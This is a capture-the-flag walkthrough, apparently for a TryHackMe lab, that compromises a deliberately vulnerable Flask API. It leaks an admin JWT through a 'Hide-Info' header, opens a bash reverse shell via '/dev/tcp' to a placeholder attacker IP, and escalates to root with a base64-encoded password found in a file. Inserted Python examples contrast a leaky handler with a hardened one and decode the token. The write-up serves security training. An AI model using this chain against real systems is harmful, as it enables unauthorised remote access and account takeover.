# Vulnerable API App

## Target Details

* Target IP: 10.10.149.135

## Service Discovery

* Scan for open ports using nmap

  ```bash
  $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
  Nmap scan report for 10.10.149.135
  Host is up (0.45s latency).
  Not shown: 997 closed tcp ports (reset)
  PORT     STATE SERVICE VERSION
  22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
  |   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
  |_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
  80/tcp   open  http    nginx 1.18.0 (Ubuntu)
  |_http-title: Welcome to nginx!
  |_http-server-header: nginx/1.18.0 (Ubuntu)
  5000/tcp open  upnp?
  | fingerprint-strings:
  |   GenericLines:
  |     HTTP/1.1 400 Bad Request
  ...

  ...
  Network Distance: 4 hops
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  TRACEROUTE (using port 143/tcp)
  HOP RTT       ADDRESS
  1   354.40 ms 10.2.0.1
  2   ... 3
  4   447.88 ms 10.10.149.135

  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  ```
* Services Found:

|   Service   | Port | Version       |
| :---------: | :--: | ------------- |
|     SSH     |  22  | OpenSSH 8.2p1 |
|  nginx HTTP |  80  | 1.18.0        |
| Web Service | 5000 | Unknown       |

* Answer the Task questions

## Content Discovery

* Visit the web application in browser
* Common API entry points are `/api` or `api.domain.com`, so try those first

  > /api worked!
* Other endpoints can be found by manually crawling the web application with the Burp Suite proxy running
* On inspecting the HTML, we find that the admin has left a message for the hacker in a page comment:

  ```html
  <!--     
  This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API!
  If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint!

  - vuln admin
  -->
  ```

  > From the comment we can conclude that we cannot sign up directly from the login page; we need to find the API endpoint used for sign-up. The admin has also hinted at the endpoint name: `users`.
* On visiting the `/api/users` endpoint, we get a JSON response listing information about the other users!

  ```json
  {
    "users": [
      {
        "userid": 1,
        "first_name": "Martin",
        "last_name": "Rodriguez",
        "admin": false
      },
      {
        "userid": 2,
        "first_name": "Kristen",
        "last_name": "Martin",
        "admin": false
      },
      ....
      {
        "userid": 27,
        "first_name": "Derek",
        "last_name": "Washington",
        "admin": true
      }
    ]
  }
  ```

  > Just by using the application we now have every account's name, user ID and role.
* In most cases an endpoint supports several HTTP methods; we can enumerate them with the `OPTIONS` method. Send the same request to the users endpoint to Repeater and change the HTTP method from `GET` to `OPTIONS`

  ```http
  GET /api/users HTTP/1.1

  # change to
  OPTIONS /api/users HTTP/1.1
  ```
* On visiting `dmdhrumilmistry`'s GitHub profile, the [app.py](https://github.com/dmdhrumilmistry/Vulnerable-API-App/blob/main/app.py) file of the [Vulnerable-API-App](https://github.com/dmdhrumilmistry/Vulnerable-API-App) repository lists all the endpoints; the useful ones for now are given below.
* Endpoints Discovered using burpsuite

|   Endpoint  | HTTP Methods Allowed       |
| :---------: | -------------------------- |
| /api/users/ | DELETE, HEAD, OPTIONS, GET |
|  /api/users | POST, OPTIONS, HEAD, GET   |

## Exploit Endpoints

* From the `/api/user/<userid:int>` endpoint we can get a user's details; from `/api/users` we can retrieve the admin's user ID and then request that account's details. In my case the admin ID is `27`.

  > The admin ID will vary per machine
* Send the Burp request to `/api/user/27`; we receive the JSON response

  ```json
  {
    "admin": true,
    "first_name": "Derek",
    "last_name": "Washington",
    "userid": 27
  }
  ```
* Using the first question's hint, we know that we need to send a `Hide-Info` header in the HTTP request.

  * Burp Request

  ```http
  GET /api/user/27 HTTP/1.1
  Hide-Info: 0
  ```

  * Burp JSON Response

  ```json
  {
    "admin": true,
    "email": "admin@vuln-api-app.com",
    "first_name": "Derek",
    "last_name": "Washington",
    "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
    "userid": 27
  }
  ```

  > Now we have the admin's token
* We can add the token to every Burp Suite request using the Add Custom Header extension; refer to the [docs](https://portswigger.net/bappstore/807907f5380c4cb38748ef4fc1d8cdbc) for installation and usage, then add the authorization token to the extension.
* Now add `http://10.10.149.135:5000` to the target scope, and capture in-scope requests only.
* Configure the Custom Header extension to add the header while using the proxy:
  * Project Options
  * Sessions
  * Under Session Handling Rules click the Add button
  * Provide a description
  * Click the Add button under Rule Actions
  * Choose `Invoke Burp Extension`
  * Set the extension handler to `Add Custom Header`
  * Click OK
  * In the Scope tab, tick the Proxy checkbox so the header is added while using the proxy. Also set URL Scope to use the suite scope
  * Click OK
* Visit HomePage `http://10.10.149.135:5000`
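The user listing at `/api/users` and the `Hide-Info: 0` header that unmasks the admin's email and token are the same class of bug: the server lets something the client controls decide which fields come back, and it serializes a credential at all. The following is an added example, not code from the Vulnerable-API-App project; it models a Flask-style handler as plain Python so it runs without Flask. The sample records, the `Principal` type and the `user_view_*` function names are constructed for illustration.

```python
"""Excessive data exposure: field filtering driven by a client-supplied header
versus by server-side authorization. Added illustration with constructed
records; Flask-style handlers are modelled as plain functions so it runs
without Flask. Not code from the Vulnerable-API-App project."""
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed records modelled on the /api/users response in the write-up.
# "token" stands in for any credential a profile endpoint should never echo.
USERS: Dict[int, dict] = {
    1: {"userid": 1, "first_name": "Martin", "last_name": "Rodriguez", "admin": False,
        "email": "martin@example.invalid", "token": "<credential-of-user-1>"},
    27: {"userid": 27, "first_name": "Derek", "last_name": "Washington", "admin": True,
         "email": "admin@vuln-api-app.com", "token": "<credential-of-user-27>"},
}

PUBLIC_FIELDS = ("userid", "first_name", "last_name", "admin")
PRIVATE_FIELDS = ("email",)   # owner or admin only; credentials are in neither list


def user_view_vulnerable(user_id: int, headers: Dict[str, str]) -> Optional[dict]:
    """Mirrors the behaviour observed on the page: a client-controlled
    Hide-Info header decides whether the sensitive fields are returned."""
    user = USERS.get(user_id)
    if user is None:
        return None
    if headers.get("Hide-Info") == "0":      # the requester picks the filter
        return dict(user)                     # leaks email and the token
    return {k: user[k] for k in PUBLIC_FIELDS}


@dataclass(frozen=True)
class Principal:
    """Identity established by the server (e.g. from a verified session),
    never taken from request headers the client can set."""
    userid: int
    admin: bool


def user_view_hardened(user_id: int, requester: Optional[Principal]) -> Optional[dict]:
    """Visibility follows the verified caller; credentials are never serialized."""
    user = USERS.get(user_id)
    if user is None:
        return None
    out = {k: user[k] for k in PUBLIC_FIELDS}
    if requester is not None and (requester.admin or requester.userid == user_id):
        out.update({k: user[k] for k in PRIVATE_FIELDS})
    return out


if __name__ == "__main__":
    print("vulnerable, Hide-Info: 0 ->", user_view_vulnerable(27, {"Hide-Info": "0"}))
    print("hardened, anonymous      ->", user_view_hardened(27, None))
    print("hardened, as admin       ->", user_view_hardened(27, Principal(27, True)))
```

The hardened handler still returns the public fields to anonymous callers, matching what the application does today; a stricter design would require authentication even for that listing. The key point is that the decision uses a principal the server established, and that the token column never reaches any serializer.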
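The token returned above can be inspected without the server's key: a JWT's header and payload are base64url-encoded JSON, and only the third segment is the signature. This added example (not from the page's author or project) decodes the page's own token and reports what a reviewer would check: the signing algorithm, the subject, and whether an `exp` claim bounds the token's lifetime. The function names `decode_jwt_unverified` and `review_token` are chosen here.

```python
"""Decode (without verifying) the JWT returned for the admin account above and
report the claims a reviewer checks. Added example; signature verification is
deliberately out of scope because it requires the server's HS256 secret."""
import base64
import json
from datetime import datetime, timezone
from typing import Dict, Tuple

# Access token copied from the /api/user/27 response on this page.
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9."
    "94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw"
)


def b64url_decode(segment: str) -> bytes:
    """JWT segments drop base64url padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> Tuple[dict, dict]:
    """Split a compact JWS and parse its header and payload JSON.
    The signature is NOT checked, so the result must not be used for authz."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)))


def review_token(token: str) -> Dict[str, object]:
    """Summarize the properties that matter when assessing a token."""
    header, payload = decode_jwt_unverified(token)
    alg = str(header.get("alg", ""))
    return {
        "alg": alg,
        "symmetric": alg.startswith("HS"),       # one shared secret signs and verifies
        "sub": payload.get("sub"),
        "issued_at": datetime.fromtimestamp(payload["iat"], tz=timezone.utc).isoformat(),
        "has_exp": "exp" in payload,             # without exp the token never expires
        "jti": payload.get("jti"),               # needed for any server-side revocation list
    }


if __name__ == "__main__":
    for key, value in review_token(TOKEN).items():
        print(f"{key:>10}: {value}")
```

On this token the review shows `HS256` (a single shared secret), subject `admin@vuln-api-app.com`, and no `exp` claim at all: once leaked through the `Hide-Info` response, a copy stays valid until the signing secret is rotated or the server starts rejecting its `jti`.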

## Get Target Machine Shell

* Visit the home page with the admin auth token attached
* From the home page, open the Admin Controls tab, from where we can run bash commands
* Using [GTFOBins Bash Reverse Shell](https://gtfobins.github.io/gtfobins/bash/#reverse-shell), get a reverse shell
* Start a netcat listener on the attacker's machine

  ```bash
  nc -nlvp 4444
  ```
* Enter the command below in the command input field

  ```bash
  bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'
  ```
* On execution of the command, we get a reverse shell on the attacker machine

  ```bash
  $ nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
  bash: cannot set terminal process group (610): Inappropriate ioctl for device
  bash: no job control in this shell
  vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$
  ```

## Get User Flag

* Read the user flag

  ```bash
  vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
  THM{REDACTED}
  ```

## Privilege Escalation

* Check whether `vulnadmin` has sudo permissions

  ```bash
  vulnadmin@vulnapiapp:~$ groups
  sudo adm cdrom dip plugdev lxd
  ```

  > `vulnadmin` is in the `sudo` group, but we first need its password to run sudo commands
* Listing the files in `vulnadmin`'s home directory, we find a `backup.txt` file

  ```bash
  vulnadmin@vulnapiapp:~$ ls -l
  total 12
  -rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
  drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
  -rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt
  ```
* On reading the file, its content appears to be base64 encoded
* Decode the `backup.txt` file

  ```bash
  vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d
  {REDACTED}
  ```

  > It's the password for the `vulnadmin` account
* To run sudo we first need to spawn a terminal. Since the deployed application runs on Flask, a Python framework, Python must be installed; verify with

  ```bash
  vulnadmin@vulnapiapp:~$ python3 --version
  Python 3.8.10
  ```
* Get an interactive shell

  ```bash
  vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
  ```
* Switch to root with `sudo su`, entering the recovered password when prompted

  ```bash
  vulnadmin@vulnapiapp:~$ sudo su
  [sudo] password for vulnadmin: {REDACTED}
  root@vulnapiapp:/home/vulnadmin/#
  ```
* Get the root flag

  ```bash
  root@vulnapiapp:~# cat /root/root.txt
  cat /root/root.txt
  THM{REDACTED}
  ```
* We've successfully rooted the machine!

